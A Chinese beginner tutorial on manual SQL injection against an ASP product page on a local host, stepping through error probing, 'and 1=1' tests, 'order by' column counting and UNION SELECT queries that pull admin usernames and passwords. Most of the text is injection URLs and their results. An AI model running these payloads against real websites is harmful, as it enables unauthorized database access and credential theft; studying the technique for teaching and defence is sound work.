快捷搜索:  汽车  科技

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)二、开始sql注入攻击and 1=1 和and 1=2 返回不同页面就是存在sql注入在id后面加'号,如果出现错误提示,则该网站可能就存在注入漏洞。http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=1http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=2

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(1)

sql注入: 应用程序在向后台数据库传递SQL( Structured Query Language 结构化查询语言 )查询时,如果攻击者提供了影响该查询的能力,就会引发SQL注入。SQL注入不只是一种会影响Web应用的漏洞,对于任何从不可信源获取输入的代码来说,如果使用输入来构造动态SQL语句,就有可能也会受到攻击。

1. 判断是不是注入点

下面还是具体拿个实例来给大家演示下,目标站:http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392,在网址后面加 '

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392'

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(2)

在id后面加'号,如果出现错误提示,则该网站可能就存在注入漏洞。

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=1

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(3)

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=2

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(4)

and 1=1 和and 1=2 返回不同页面就是存在sql注入

二、开始sql注入攻击

判断字段

oder by XX

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 order by 23

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(5)

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 order by 22

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(6)

22正确,23错误。说明存在22个字段

三、猜解表名(一般admin,user,username 也就极品管理员随意设置的)

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from admin

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(7)

存在admin表明,并且爆出数字3和15

我们随便输入一个表名看下

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(8)

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from user

出错,说明不存在user表

四、猜解列名内容

我们根据爆出的数字填写列名(admin username password)

http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 admin 4 5 6 7 8 9 10 11 12 13 14 password 16 17 18 19 20 21 22 from admin

sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)(9)

很简单吧,几条几句就可以查询到账号密码

喜欢学习黑客技术的可以关注我,

每天都会有相应的教程发布。

谢谢大家

猜您喜欢: